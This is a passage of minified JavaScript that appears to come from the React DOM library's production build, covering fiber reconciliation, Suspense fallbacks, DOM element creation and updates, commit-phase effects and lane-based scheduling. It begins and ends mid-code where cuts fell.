0!==r.fallback&&Uo(t),e=r.children,o=r.fallback,i?(e=el(t,e,o,n),t.child.memoizedState={baseLanes:n},t.memoizedState=Ji,e):"number"==typeof r.unstable_expectedLoadTime?(e=el(t,e,o,n),t.child.memoizedState={baseLanes:n},t.memoizedState=Ji,t.lanes=33554432,e):((n=qs({mode:"visible",children:e},t.mode,n,null)).return=t,t.child=n)):(e.memoizedState,i?(r=function(e,t,n,a,r){var o=t.mode,i=e.child;e=i.sibling;var l={mode:"hidden",children:n};return 0==(2&o)&&t.child!==i?((n=t.child).childLanes=0,n.pendingProps=l,null!==(i=n.lastEffect)?(t.firstEffect=n.firstEffect,t.lastEffect=i,i.nextEffect=null):t.firstEffect=t.lastEffect=null):n=Us(i,l),null!==e?a=Us(e,a):(a=Gs(a,o,r,null)).flags|=2,a.return=t,n.return=t,n.sibling=a,t.child=n,a}(e,t,r.children,r.fallback,n),i=t.child,o=e.child.memoizedState,i.memoizedState=null===o?{baseLanes:n}:{baseLanes:o.baseLanes|n},i.childLanes=e.childLanes&~n,t.memoizedState=Ji,r):(n=function(e,t,n,a){var r=e.child;return e=r.sibling,n=Us(r,{mode:"visible",children:n}),0==(2&t.mode)&&(n.lanes=a),n.return=t,n.sibling=null,null!==e&&(e.nextEffect=null,e.flags=8,t.firstEffect=t.lastEffect=e),t.child=n}(e,t,r.children,n),t.memoizedState=null,n))}function el(e,t,n,a){var r=e.mode,o=e.child;return t={mode:"hidden",children:t},0==(2&r)&&null!==o?(o.childLanes=0,o.pendingProps=t):o=qs(t,r,0,null),n=Gs(n,r,a,null),o.return=e,n.return=e,o.sibling=n,e.child=o,n}function tl(e,t){e.lanes|=t;var n=e.alternate;null!==n&&(n.lanes|=t),ro(e.return,t)}function nl(e,t,n,a,r,o){var i=e.memoizedState;null===i?e.memoizedState={isBackwards:t,rendering:null,renderingStartTime:0,last:a,tail:n,tailMode:r,lastEffect:o}:(i.isBackwards=t,i.rendering=null,i.renderingStartTime=0,i.last=a,i.tail=n,i.tailMode=r,i.lastEffect=o)}function al(e,t,n){var a=t.pendingProps,r=a.revealOrder,o=a.tail;if(Oi(e,t,a.children,n),0!=(2&(a=Oo.current)))a=1&a|2,t.flags|=64;else{if(null!==e&&0!=(64&e.flags))e:for(e=t.child;null!==e;){if(13===e.tag)null!==e.memoizedState&&tl(e,n);else if(19===e.tag)tl(e,n);else if(null!==e.child){e.child.return=e,e=e.child;continue}if(e===t)break e;for(;null===e.sibling;){if(null===e.return||e.return===t)break e;e=e.return}e.sibling.return=e.return,e=e.sibling}a&=1}if(dr(Oo,a),0==(2&t.mode))t.memoizedState=null;else switch(r){case"forwards":for(n=t.child,r=null;null!==n;)null!==(e=n.alternate)&&null===jo(e)&&(r=n),n=n.sibling;null===(n=r)?(r=t.child,t.child=null):(r=n.sibling,n.sibling=null),nl(t,!1,r,n,o,t.lastEffect);break;case"backwards":for(n=null,r=t.child,t.child=null;null!==r;){if(null!==(e=r.alternate)&&null===jo(e)){t.child=r;break}e=r.sibling,r.sibling=n,n=r,r=e}nl(t,!0,n,null,o,t.lastEffect);break;case"together":nl(t,!1,null,null,void 0,t.lastEffect);break;default:t.memoizedState=null}return t.child}function rl(e,t,n){if(null!==e&&(t.dependencies=e.dependencies),Vl|=t.lanes,0!=(n&t.childLanes)){if(null!==e&&t.child!==e.child)throw Error(i(153));if(null!==t.child){for(n=Us(e=t.child,e.pendingProps),t.child=n,n.return=t;null!==e.sibling;)e=e.sibling,(n=n.sibling=Us(e,e.pendingProps)).return=t;n.sibling=null}return t.child}return null}function ol(e,t){if(!Wo)switch(e.tailMode){case"hidden":t=e.tail;for(var n=null;null!==t;)null!==t.alternate&&(n=t),t=t.sibling;null===n?e.tail=null:n.sibling=null;break;case"collapsed":n=e.tail;for(var a=null;null!==n;)null!==n.alternate&&(a=n),n=n.sibling;null===a?t||null===e.tail?e.tail=null:e.tail.sibling=null:a.sibling=null}}function il(e,t,n){var a=t.pendingProps;switch(t.tag){case 2:case 16:case 15:case 0:case 11:case 7:case 8:case 12:case 9:case 14:return null;case 1:case 17:return vr(t.type)&&_r(),null;case 3:return Ho(),cr(fr),cr(mr),Xo(),(a=t.stateNode).pendingContext&&(a.context=a.pendingContext,a.pendingContext=null),null!==e&&null!==e.child||(Go(t)?t.flags|=4:a.hydrate||(t.flags|=256)),Ki(t),null;case 5:Ro(t);var o=Ao(zo.current);if(n=t.type,null!==e&&null!=t.stateNode)Xi(e,t,n,a,o),e.ref!==t.ref&&(t.flags|=128);else{if(!a){if(null===t.stateNode)throw Error(i(166));return null}if(e=Ao(Zo.current),Go(t)){a=t.stateNode,n=t.type;var l=t.memoizedProps;switch(a[Ja]=t,a[Ya]=l,n){case"dialog":Za("cancel",a),Za("close",a);break;case"iframe":case"object":case"embed":Za("load",a);break;case"video":case"audio":for(e=0;e<Sa.length;e++)Za(Sa[e],a);break;case"source":Za("error",a);break;case"img":case"image":case"link":Za("error",a),Za("load",a);break;case"details":Za("toggle",a);break;case"input":ee(a,l),Za("invalid",a);break;case"select":a._wrapperState={wasMultiple:!!l.multiple},Za("invalid",a);break;case"textarea":se(a,l),Za("invalid",a)}for(var p in ke(n,l),e=null,l)l.hasOwnProperty(p)&&(o=l[p],"children"===p?"string"==typeof o?a.textContent!==o&&(e=["children",o]):"number"==typeof o&&a.textContent!==""+o&&(e=["children",""+o]):s.hasOwnProperty(p)&&null!=o&&"onScroll"===p&&Za("scroll",a));switch(n){case"input":X(a),ae(a,l,!0);break;case"textarea":X(a),ce(a);break;case"select":case"option":break;default:"function"==typeof l.onClick&&(a.onclick=Va)}a=e,t.updateQueue=a,null!==a&&(t.flags|=4)}else{switch(p=9===o.nodeType?o:o.ownerDocument,e===de.html&&(e=ue(n)),e===de.html?"script"===n?((e=p.createElement("div")).innerHTML="<script><\/script>",e=e.removeChild(e.firstChild)):"string"==typeof a.is?e=p.createElement(n,{is:a.is}):(e=p.createElement(n),"select"===n&&(p=e,a.multiple?p.multiple=!0:a.size&&(p.size=a.size))):e=p.createElementNS(e,n),e[Ja]=t,e[Ya]=a,qi(e,t,!1,!1),t.stateNode=e,p=Ee(n,a),n){case"dialog":Za("cancel",e),Za("close",e),o=a;break;case"iframe":case"object":case"embed":Za("load",e),o=a;break;case"video":case"audio":for(o=0;o<Sa.length;o++)Za(Sa[o],e);o=a;break;case"source":Za("error",e),o=a;break;case"img":case"image":case"link":Za("error",e),Za("load",e),o=a;break;case"details":Za("toggle",e),o=a;break;case"input":ee(e,a),o=Y(e,a),Za("invalid",e);break;case"option":o=oe(e,a);break;case"select":e._wrapperState={wasMultiple:!!a.multiple},o=r({},a,{value:void 0}),Za("invalid",e);break;case"textarea":se(e,a),o=le(e,a),Za("invalid",e);break;default:o=a}ke(n,o);var c=o;for(l in c)if(c.hasOwnProperty(l)){var d=c[l];"style"===l?xe(e,d):"dangerouslySetInnerHTML"===l?null!=(d=d?d.__html:void 0)&&ge(e,d):"children"===l?"string"==typeof d?("textarea"!==n||""!==d)&&ve(e,d):"number"==typeof d&&ve(e,""+d):"suppressContentEditableWarning"!==l&&"suppressHydrationWarning"!==l&&"autoFocus"!==l&&(s.hasOwnProperty(l)?null!=d&&"onScroll"===l&&Za("scroll",e):null!=d&&b(e,l,d,p))}switch(n){case"input":X(e),ae(e,a,!1);break;case"textarea":X(e),ce(e);break;case"option":null!=a.value&&e.setAttribute("value",""+q(a.value));break;case"select":e.multiple=!!a.multiple,null!=(l=a.value)?ie(e,!!a.multiple,l,!1):null!=a.defaultValue&&ie(e,!!a.multiple,a.defaultValue,!0);break;default:"function"==typeof o.onClick&&(e.onclick=Va)}Da(n,a)&&(t.flags|=4)}null!==t.ref&&(t.flags|=128)}return null;case 6:if(e&&null!=t.stateNode)Qi(e,t,e.memoizedProps,a);else{if("string"!=typeof a&&null===t.stateNode)throw Error(i(166));n=Ao(zo.current),Ao(Zo.current),Go(t)?(a=t.stateNode,n=t.memoizedProps,a[Ja]=t,a.nodeValue!==n&&(t.flags|=4)):((a=(9===n.nodeType?n:n.ownerDocument).createTextNode(a))[Ja]=t,t.stateNode=a)}return null;case 13:return cr(Oo),a=t.memoizedState,0!=(64&t.flags)?(t.lanes=n,t):(a=null!==a,n=!1,null===e?void 0!==t.memoizedProps.fallback&&Go(t):n=null!==e.memoizedState,a&&!n&&0!=(2&t.mode)&&(null===e&&!0!==t.memoizedProps.unstable_avoidThisFallback||0!=(1&Oo.current)?0===Rl&&(Rl=3):(0!==Rl&&3!==Rl||(Rl=4),null===zl||0==(134217727&Vl)&&0==(134217727&Fl)||vs(zl,Bl))),(a||n)&&(t.flags|=4),null);case 4:return Ho(),Ki(t),null===e&&za(t.stateNode.containerInfo),null;case 10:return ao(t),null;case 19:if(cr(Oo),null===(a=t.memoizedState))return null;if(l=0!=(64&t.flags),null===(p=a.rendering))if(l)ol(a,!1);else{if(0!==Rl||null!==e&&0!=(64&e.flags))for(e=t.child;null!==e;){if(null!==(p=jo(e))){for(t.flags|=64,ol(a,!1),null!==(l=p.updateQueue)&&(t.updateQueue=l,t.flags|=4),null===a.lastEffect&&(t.firstEffect=null),t.lastEffect=a.lastEffect,a=n,n=t.child;null!==n;)e=a,(l=n).flags&=2,l.nextEffect=null,l.firstEffect=null,l.lastEffect=null,null===(p=l.alternate)?(l.childLanes=0,l.lanes=e,l.child=null,l.memoizedProps=null,l.memoizedState=null,l.updateQueue=null,l.dependencies=null,l.stateNode=null):(l.childLanes=p.childLanes,l.lanes=p.lanes,l.child=p.child,l.memoizedProps=p.memoizedProps,l.memoizedState=p.memoizedState,l.updateQueue=p.updateQueue,l.type=p.type,e=p.dependencies,l.dependencies=null===e?null:{lanes:e.lanes,firstContext:e.firstContext}),n=n.sibling;return dr(Oo,1&Oo.current|2),t.child}e=e.sibling}null!==a.tail&&Dr()>Ul&&(t.flags|=64,l=!0,ol(a,!1),t.lanes=33554432)}else{if(!l)if(null!==(e=jo(p))){if(t.flags|=64,l=!0,null!==(n=e.updateQueue)&&(t.updateQueue=n,t.flags|=4),ol(a,!0),null===a.tail&&"hidden"===a.tailMode&&!p.alternate&&!Wo)return null!==(t=t.lastEffect=a.lastEffect)&&(t.nextEffect=null),null}else 2*Dr()-a.renderingStartTime>Ul&&1073741824!==n&&(t.flags|=64,l=!0,ol(a,!1),t.lanes=33554432);a.isBackwards?(p.sibling=t.child,t.child=p):(null!==(n=a.last)?n.sibling=p:t.child=p,a.last=p)}return null!==a.tail?(n=a.tail,a.rendering=n,a.tail=n.sibling,a.lastEffect=t.lastEffect,a.renderingStartTime=Dr(),n.sibling=null,t=Oo.current,dr(Oo,l?1&t|2:1&t),n):null;case 23:case 24:return ys(),null!==e&&null!==e.memoizedState!=(null!==t.memoizedState)&&"unstable-defer-without-hiding"!==a.mode&&(t.flags|=4),null}throw Error(i(156,t.tag))}function ll(e){switch(e.tag){case 1:vr(e.type)&&_r();var t=e.flags;return 4096&t?(e.flags=-4097&t|64,e):null;case 3:if(Ho(),cr(fr),cr(mr),Xo(),0!=(64&(t=e.flags)))throw Error(i(285));return e.flags=-4097&t|64,e;case 5:return Ro(e),null;case 13:return cr(Oo),4096&(t=e.flags)?(e.flags=-4097&t|64,e):null;case 19:return cr(Oo),null;case 4:return Ho(),null;case 10:return ao(e),null;case 23:case 24:return ys(),null;default:return null}}function sl(e,t){try{var n="",a=t;do{n+=$(a),a=a.return}while(a);var r=n}catch(e){r="\nError generating stack: "+e.message+"\n"+e.stack}return{value:e,source:t,stack:r}}function pl(e,t){try{console.error(t.value)}catch(e){setTimeout((function(){throw e}))}}qi=function(e,t){for(var n=t.child;null!==n;){if(5===n.tag||6===n.tag)e.appendChild(n.stateNode);else if(4!==n.tag&&null!==n.child){n.child.return=n,n=n.child;continue}if(n===t)break;for(;null===n.sibling;){if(null===n.return||n.return===t)return;n=n.return}n.sibling.return=n.return,n=n.sibling}},Ki=function(){},Xi=function(e,t,n,a){var o=e.memoizedProps;if(o!==a){e=t.stateNode,Ao(Zo.current);var i,l=null;switch(n){case"input":o=Y(e,o),a=Y(e,a),l=[];break;case"option":o=oe(e,o),a=oe(e,a),l=[];break;case"select":o=r({},o,{value:void 0}),a=r({},a,{value:void 0}),l=[];break;case"textarea":o=le(e,o),a=le(e,a),l=[];break;default:"function"!=typeof o.onClick&&"function"==typeof a.onClick&&(e.onclick=Va)}for(d in ke(n,a),n=null,o)if(!a.hasOwnProperty(d)&&o.hasOwnProperty(d)&&null!=o[d])if("style"===d){var p=o[d];for(i in p)p.hasOwnProperty(i)&&(n||(n={}),n[i]="")}else"dangerouslySetInnerHTML"!==d&&"children"!==d&&"suppressContentEditableWarning"!==d&&"suppressHydrationWarning"!==d&&"autoFocus"!==d&&(s.hasOwnProperty(d)?l||(l=[]):(l=l||[]).push(d,null));for(d in a){var c=a[d];if(p=null!=o?o[d]:void 0,a.hasOwnProperty(d)&&c!==p&&(null!=c||null!=p))if("style"===d)if(p){for(i in p)!p.hasOwnProperty(i)||c&&c.hasOwnProperty(i)||(n||(n={}),n[i]="");for(i in c)c.hasOwnProperty(i)&&p[i]!==c[i]&&(n||(n={}),n[i]=c[i])}else n||(l||(l=[]),l.push(d,n)),n=c;else"dangerouslySetInnerHTML"===d?(c=c?c.__html:void 0,p=p?p.__html:void 0,null!=c&&p!==c&&(l=l||[]).push(d,c)):"children"===d?"string"!=typeof c&&"number"!=typeof c||(l=l||[]).push(d,""+c):"suppressContentEditableWarning"!==d&&"suppressHydrationWarning"!==d&&(s.hasOwnProperty(d)?(null!=c&&"onScroll"===d&&Za("scroll",e),l||p===c||(l=[])):"object"==typeof c&&null!==c&&c.$$typeof===H?c.toString():(l=l||[]).push(d,c))}n&&(l=l||[]).push("style",n);var d=l;(t.updateQueue=d)&&(t.flags|=4)}},Qi=function(e,t,n,a){n!==a&&(t.flags|=4)};var cl="function"==typeof WeakMap?WeakMap:Map;function dl(e,t,n){(n=co(-1,n)).tag=3,n.payload={element:null};var a=t.value;return n.callback=function(){Kl||(Kl=!0,Xl=a),pl(0,t)},n}function ul(e,t,n){(n=co(-1,n)).tag=3;var a=e.type.getDerivedStateFromError;if("function"==typeof a){var r=t.value;n.payload=function(){return pl(0,t),a(r)}}var o=e.stateNode;return null!==o&&"function"==typeof o.componentDidCatch&&(n.callback=function(){"function"!=typeof a&&(null===Ql?Ql=new Set([this]):Ql.add(this),pl(0,t));var e=t.stack;this.componentDidCatch(t.value,{componentStack:null!==e?e:""})}),n}var ml="function"==typeof WeakSet?WeakSet:Set;function fl(e){var t=e.ref;if(null!==t)if("function"==typeof t)try{t(null)}catch(t){js(e,t)}else t.current=null}function hl(e,t){switch(t.tag){case 0:case 11:case 15:case 22:case 5:case 6:case 4:case 17:return;case 1:if(256&t.flags&&null!==e){var n=e.memoizedProps,a=e.memoizedState;t=(e=t.stateNode).getSnapshotBeforeUpdate(t.elementType===t.type?n:Qr(t.type,n),a),e.__reactInternalSnapshotBeforeUpdate=t}return;case 3:return void(256&t.flags&&Ga(t.stateNode.containerInfo))}throw Error(i(163))}function gl(e,t,n){switch(n.tag){case 0:case 11:case 15:case 22:if(null!==(t=null!==(t=n.updateQueue)?t.lastEffect:null)){e=t=t.next;do{if(3==(3&e.tag)){var a=e.create;e.destroy=a()}e=e.next}while(e!==t)}if(null!==(t=null!==(t=n.updateQueue)?t.lastEffect:null)){e=t=t.next;do{var r=e;a=r.next,0!=(4&(r=r.tag))&&0!=(1&r)&&(Ts(n,e),Hs(n,e)),e=a}while(e!==t)}return;case 1:return e=n.stateNode,4&n.flags&&(null===t?e.componentDidMount():(a=n.elementType===n.type?t.memoizedProps:Qr(n.type,t.memoizedProps),e.componentDidUpdate(a,t.memoizedState,e.__reactInternalSnapshotBeforeUpdate))),void(null!==(t=n.updateQueue)&&ho(n,t,e));case 3:if(null!==(t=n.updateQueue)){if(e=null,null!==n.child)switch(n.child.tag){case 5:case 1:e=n.child.stateNode}ho(n,t,e)}return;case 5:return e=n.stateNode,void(null===t&&4&n.flags&&Da(n.type,n.memoizedProps)&&e.focus());case 6:case 4:case 12:case 19:case 17:case 20:case 21:case 23:case 24:return;case 13:return void(null===n.memoizedState&&(n=n.alternate,null!==n&&(n=n.memoizedState,null!==n&&(n=n.dehydrated,null!==n&&xt(n)))))}throw Error(i(163))}function vl(e,t){for(var n=e;;){if(5===n.tag){var a=n.stateNode;if(t)"function"==typeof(a=a.style).setProperty?a.setProperty("display","none","important"):a.display="none";else{a=n.stateNode;var r=n.memoizedProps.style;r=null!=r&&r.hasOwnProperty("display")?r.display:null,a.style.display=be("display",r)}}else if(6===n.tag)n.stateNode.nodeValue=t?"":n.memoizedProps;else if((23!==n.tag&&24!==n.tag||null===n.memoizedState||n===e)&&null!==n.child){n.child.return=n,n=n.child;continue}if(n===e)break;for(;null===n.sibling;){if(null===n.return||n.return===e)return;n=n.return}n.sibling.return=n.return,n=n.sibling}}function _l(e,t){if(Er&&"function"==typeof Er.onCommitFiberUnmount)try{Er.onCommitFiberUnmount(kr,t)}catch(e){}switch(t.tag){case 0:case 11:case 14:case 15:case 22:if(null!==(e=t.updateQueue)&&null!==(e=e.lastEffect)){var n=e=e.next;do{var a=n,r=a.destroy;if(a=a.tag,void 0!==r)if(0!=(4&a))Ts(t,n);else{a=t;try{r()}catch(e){js(a,e)}}n=n.next}while(n!==e)}break;case 1:if(fl(t),"function"==typeof(e=t.stateNode).componentWillUnmount)try{e.props=t.memoizedProps,e.state=t.memoizedState,e.componentWillUnmount()}catch(e){js(t,e)}break;case 5:fl(t);break;case 4:El(e,t)}}function wl(e){e.alternate=null,e.child=null,e.dependencies=null,e.firstEffect=null,e.lastEffect=null,e.memoizedProps=null,e.memoizedState=null,e.pendingProps=null,e.return=null,e.updateQueue=null}function bl(e){return 5===e.tag||3===e.tag||4===e.tag}function xl(e){e:{for(var t=e.return;null!==t;){if(bl(t))break e;t=t.return}throw Error(i(160))}var n=t;switch(t=n.stateNode,n.tag){case 5:var a=!1;break;case 3:case 4:t=t.containerInfo,a=!0;break;default:throw Error(i(161))}16&n.flags&&(ve(t,""),n.flags&=-17);e:t:for(n=e;;){for(;null===n.sibling;){if(null===n.return||bl(n.return)){n=null;break e}n=n.return}for(n.sibling.return=n.return,n=n.sibling;5!==n.tag&&6!==n.tag&&18!==n.tag;){if(2&n.flags)continue t;if(null===n.child||4===n.tag)continue t;n.child.return=n,n=n.child}if(!(2&n.flags)){n=n.stateNode;break e}}a?yl(e,n,t):kl(e,n,t)}function yl(e,t,n){var a=e.tag,r=5===a||6===a;if(r)e=r?e.stateNode:e.stateNode.instance,t?8===n.nodeType?n.parentNode.insertBefore(e,t):n.insertBefore(e,t):(8===n.nodeType?(t=n.parentNode).insertBefore(e,n):(t=n).appendChild(e),null!=(n=n._reactRootContainer)||null!==t.onclick||(t.onclick=Va));else if(4!==a&&null!==(e=e.child))for(yl(e,t,n),e=e.sibling;null!==e;)yl(e,t,n),e=e.sibling}function kl(e,t,n){var a=e.tag,r=5===a||6===a;if(r)e=r?e.stateNode:e.stateNode.instance,t?n.insertBefore(e,t):n.appendChild(e);else if(4!==a&&null!==(e=e.child))for(kl(e,t,n),e=e.sibling;null!==e;)kl(e,t,n),e=e.sibling}function El(e,t){for(var n,a,r=t,o=!1;;){if(!o){o=r.return;e:for(;;){if(null===o)throw Error(i(160));switch(n=o.stateNode,o.tag){case 5:a=!1;break e;case 3:case 4:n=n.containerInfo,a=!0;break e}o=o.return}o=!0}if(5===r.tag||6===r.tag){e:for(var l=e,s=r,p=s;;)if(_l(l,p),null!==p.child&&4!==p.tag)p.child.return=p,p=p.child;else{if(p===s)break e;for(;null===p.sibling;){if(null===p.return||p.return===s)break e;p=p.return}p.sibling.return=p.return,p=p.sibling}a?(l=n,s=r.stateNode,8===l.nodeType?l.parentNode.removeChild(s):l.removeChild(s)):n.removeChild(r.stateNode)}else if(4===r.tag){if(null!==r.child){n=r.stateNode.containerInfo,a=!0,r.child.return=r,r=r.child;continue}}else if(_l(e,r),null!==r.child){r.child.return=r,r=r.child;continue}if(r===t)break;for(;null===r.sibling;){if(null===r.return||r.return===t)return;4===(r=r.return).tag&&(o=!1)}r.sibling.return=r.return,r=r.sibling}}function Cl(e,t){switch(t.tag){case 0:case 11:case 14:case 15:case 22:var n=t.updateQueue;if(null!==(n=null!==n?n.lastEffect:null)){var a=n=n.next;do{3==(3&a.tag)&&(e=a.destroy,a.destroy=void 0,void 0!==e&&e()),a=a.next}while(a!==n)}return;case 1:case 12:case 17:return;case 5:if(null!=(n=t.stateNode)){a=t.memoizedProps;var r=null!==e?e.memoizedProps:a;e=t.type;var o=t.updateQueue;if(t.updateQueue=null,null!==o){for(n[Ya]=a,"input"===e&&"radio"===a.type&&null!=a.name&&te(n,a),Ee(e,r),t=Ee(e,a),r=0;r<o.length;r+=2){var l=o[r],s=o[r+1];"style"===l?xe(n,s):"dangerouslySetInnerHTML"===l?ge(n,s):"children"===l?ve(n,s):b(n,l,s,t)}switch(e){case"input":ne(n,a);break;case"textarea":pe(n,a);break;case"select":e=n._wrapperState.wasMultiple,n._wrapperState.wasMultiple=!!a.multiple,null!=(o=a.value)?ie(n,!!a.multiple,o,!1):e!==!!a.multiple&&(null!=a.defaultValue?ie(n,!!a.multiple,a.defaultValue,!0):ie(n,!!a.multiple,a.multiple?[]:"",!1))}}}return;case 6:if(null===t.stateNode)throw Error(i(162));return void(t.stateNode.nodeValue=t.memoizedProps);case 3:return void((n=t.stateNode).hydrate&&(n.hydrate=!1,xt(n.containerInfo)));case 13:return null!==t.memoizedState&&(Il=Dr(),vl(t.child,!0)),void Sl(t);case 19:return void Sl(t);case 23:case 24:return void vl(t,null!==t.memoizedState)}throw Error(i(163))}function Sl(e){var t=e.updateQueue;if(null!==t){e.updateQueue=null;var n=e.stateNode;null===n&&(n=e.stateNode=new ml),t.forEach((function(t){var a=Fs.bind(null,e,t);n.has(t)||(n.add(t),t.then(a,a))}))}}function Ml(e,t){return null!==e&&(null===(e=e.memoizedState)||null!==e.dehydrated)&&null!==(t=t.memoizedState)&&null===t.dehydrated}var Ll=Math.ceil,Nl=x.ReactCurrentDispatcher,Zl=x.ReactCurrentOwner,Pl=0,zl=null,Al=null,Bl=0,Hl=0,Tl=pr(0),Rl=0,Ol=null,jl=0,Vl=0,Fl=0,Wl=0,Dl=null,Il=0,Ul=1/0;function $l(){Ul=Dr()+500}var Gl,ql=null,Kl=!1,Xl=null,Ql=null,Jl=!1,Yl=null,es=90,ts=[],ns=[],as=null,rs=0,os=null,is=-1,ls=0,ss=0,ps=null,cs=!1;function ds(){return 0!=(48&Pl)?Dr():-1!==is?is:is=Dr()}function us(e){if(0==(2&(e=e.mode)))return 1;if(0==(4&e))return 99===Ir()?1:2;if(0===ls&&(ls=jl),0!==Xr.transition){0!==ss&&(ss=null!==Dl?Dl.pendingLanes:0),e=ls;var t=4186112&~ss;return 0==(t&=-t)&&0==(t=(e=4186112&~e)&-e)&&(t=8192),t}return e=Ir(),e=jt(0!=(4&Pl)&&98===e?12:e=function(e){switch(e){case 99:return 15;case 98:return 10;case 97:case 96:return 8;case 95:return 2;default:return 0}}(e),ls)}function ms(e,t,n){if(50<rs)throw rs=0,os=null,Error(i(185));if(null===(e=fs(e,t)))return null;Wt(e,t,n),e===zl&&(Fl|=t,4===Rl&&vs(e,Bl));var a=Ir();1===t?0!=(8&Pl)&&0==(48&Pl)?_s(e):(hs(e,n),0===Pl&&($l(),qr())):(0==(4&Pl)||98!==a&&99!==a||(null===as?as=new Set([e]):as.add(e)),hs(e,n)),Dl=e}function fs(e,t){e.lanes|=t;var n=e.alternate;for(null!==n&&(n.lanes|=t),n=e,e=e.return;null!==e;)e.childLanes|=t,null!==(n=e.alternate)&&(n.childLanes|=t),n=e,e=e.return;return 3===n.tag?n.stateNode:null}function hs(e,t){for(var n=e.callbackNode,a=e.suspendedLanes,r=e.pingedLanes,o=e.expirationTimes,l=e.pendingLanes;0<l;){var s=31-Dt(l),p=1<<s,c=o[s];if(-1===c){if(0==(p&a)||0!=(p&r)){c=t,Tt(p);var d=Ht;o[s]=10<=d?c+250:6<=d?c+5e3:-1}}else c<=t&&(e.expiredLanes|=p);l&=~p}if(a=Rt(e,e===zl?Bl:0),t=Ht,0===a)null!==n&&(n!==Rr&&Mr(n),e.callbackNode=null,e.callbackPriority=0);else{if(null!==n){if(e.callbackPriority===t)return;n!==Rr&&Mr(n)}15===t?(n=_s.bind(null,e),null===jr?(jr=[n],Vr=Sr(zr,Kr)):jr.push(n),n=Rr):14===t?n=Gr(99,_s.bind(null,e)):(n=function(e){switch(e){case 15:case 14:return 99;case 13:case 12:case 11:case 10:return 98;case 9:case 8:case 7:case 6:case 4:case 5:return 97;case 3:case 2:case 1:return 95;case 0:return 90;default:throw Error(i(358,e))}}(t),n=Gr(n,gs.bind(null,e))),e.callbackPriority=t,e.callbackNode=n}}function gs(e){if(is=-1,ss=ls=0,0!=(48&Pl))throw Error(i(327));var t=e.callbackNode;if(Bs()&&e.callbackNode!==t)return null;var n=Rt(e,e===zl?Bl:0);if(0===n)return null;var a=n,r=Pl;Pl|=16;var o=Cs();for(zl===e&&Bl===a||($l(),ks(e,a));;)try{Ls();break}catch(t){Es(e,t)}if(no(),Nl.current=o,Pl=r,null!==Al?a=0:(zl=null,Bl=0,a=Rl),0!=(jl&Fl))ks(e,0);else if(0!==a){if(2===a&&(Pl|=64,e.hydrate&&(e.hydrate=!1,Ga(e.containerInfo)),0!==(n=Ot(e))&&(a=Ss(e,n))),1===a)throw t=Ol,ks(e,0),vs(e,n),hs(e,Dr()),t;switch(e.finishedWork=e.current.alternate,e.finishedLanes=n,a){case 0:case 1:throw Error(i(345));case 2:case 5:Ps(e);break;case 3:if(vs(e,n),(62914560&n)===n&&10<(a=Il+500-Dr())){if(0!==Rt(e,0))break;if(((r=e.suspendedLanes)&n)!==n){ds(),e.pingedLanes|=e.suspendedLanes&r;break}e.timeoutHandle=Ua(Ps.bind(null,e),a);break}Ps(e);break;case 4:if(vs(e,n),(4186112&n)===n)break;for(a=e.eventTimes,r=-1;0<n;){var l=31-Dt(n);o=1<<l,(l=a[l])>r&&(r=l),n&=~o}if(n=r,10<(n=(120>(n=Dr()-n)?120:480>n?480:1080>n?1080:1920>n?1920:3e3>n?3e3:4320>n?4320:1960*Ll(n/1960))-n)){e.timeoutHandle=Ua(Ps.bind(null,e),n);break}Ps(e);break;default:throw Error(i(329))}}return hs(e,Dr()),e.callbackNode===t?gs.bind(null,e):null}function vs(e,t){for(t&=~Wl,t&=~Fl,e.suspendedLanes|=t,e.pingedLanes&=~t,e=e.expirationTimes;0<t;){var n=31-Dt(t),a=1<<n;e[n]=-1,t&=~a}}function _s(e){if(0!=(48&Pl))throw Error(i(327));if(Bs(),e===zl&&0!=(e.expiredLanes&Bl)){var t=Bl,n=Ss(e,t);0!=(jl&Fl)&&(n=Ss(e,t=Rt(e,t)))}else n=Ss(e,t=Rt(e,0));if(0!==e.tag&&2===n&&(Pl|=64,e.hydrate&&(e.hydrate=!1,Ga(e.containerInfo)),0!==(t=Ot(e))&&(n=Ss(e,t))),1===n)throw n=Ol,ks(e,0),vs(e,t),hs(e,Dr()),n;return e.finishedWork=e.current.alternate,e.finishedLanes=t,Ps(e),hs(e,Dr()),null}function ws(e,t){var n=Pl;Pl|=1;try{return e(t)}finally{0===(Pl=n)&&($l(),qr())}}function bs(e,t){var n=Pl;Pl&=-2,Pl|=8;try{return e(t)}finally{0===(Pl=n)&&($l(),qr())}}function xs(e,t){dr(Tl,Hl),Hl|=t,jl|=t}function ys(){Hl=Tl.current,cr(Tl)}function ks(e,t){e.finishedWork=null,e.finishedLanes=0;var n=e.timeoutHandle;if(-1!==n&&(e.timeoutHandle=-1,$a(n)),null!==Al)for(n=Al.return;null!==n;){var a=n;switch(a.tag){case 1:null!=(a=a.type.childContextTypes)&&_r();break;case 3:Ho(),cr(fr),cr(mr),Xo();break;case 5:Ro(a);break;case 4:Ho();break;case 13:case 19:cr(Oo);break;case 10:ao(a);break;case 23:case 24:ys()}n=n.return}zl=e,Al=Us(e.current,null),Bl=Hl=jl=t,Rl=0,Ol=null,Wl=Fl=Vl=0}function Es(e,t){for(;;){var n=Al;try{if(no(),Qo.current=zi,ai){for(var a=ei.memoizedState;null!==a;){var r=a.queue;null!==r&&(r.pending=null),a=a.next}ai=!1}if(Yo=0,ni=ti=ei=null,ri=!1,Zl.current=null,null===n||null===n.return){Rl=1,Ol=t,Al=null;break}e:{var o=e,i=n.return,l=n,s=t;if(t=Bl,l.flags|=2048,l.firstEffect=l.lastEffect=null,null!==s&&"object"==typeof s&&"function"==typeof s.then){var p=s;if(0==(2&l.mode)){var c=l.alternate;c?(l.updateQueue=c.updateQueue,l.memoizedState=c.memoizedState,l.lanes=c.lanes):(l.updateQueue=null,l.memoizedState=null)}var d=0!=(1&Oo.current),u=i;do{var m;if(m=13===u.tag){var f=u.memoizedState;if(null!==f)m=null!==f.dehydrated;else{var h=u.memoizedProps;m=void 0!==h.fallback&&(!0!==h.unstable_avoidThisFallback||!d)}}if(m){var g=u.updateQueue;if(null===g){var v=new Set;v.add(p),u.updateQueue=v}else g.add(p);if(0==(2&u.mode)){if(u.flags|=64,l.flags|=16384,l.flags&=-2981,1===l.tag)if(null===l.alternate)l.tag=17;else{var _=co(-1,1);_.tag=2,uo(l,_)}l.lanes|=1;break e}s=void 0,l=t;var w=o.pingCache;if(null===w?(w=o.pingCache=new cl,s=new Set,w.set(p,s)):void 0===(s=w.get(p))&&(s=new Set,w.set(p,s)),!s.has(l)){s.add(l);var b=Vs.bind(null,o,p,l);p.then(b,b)}u.flags|=4096,u.lanes=t;break 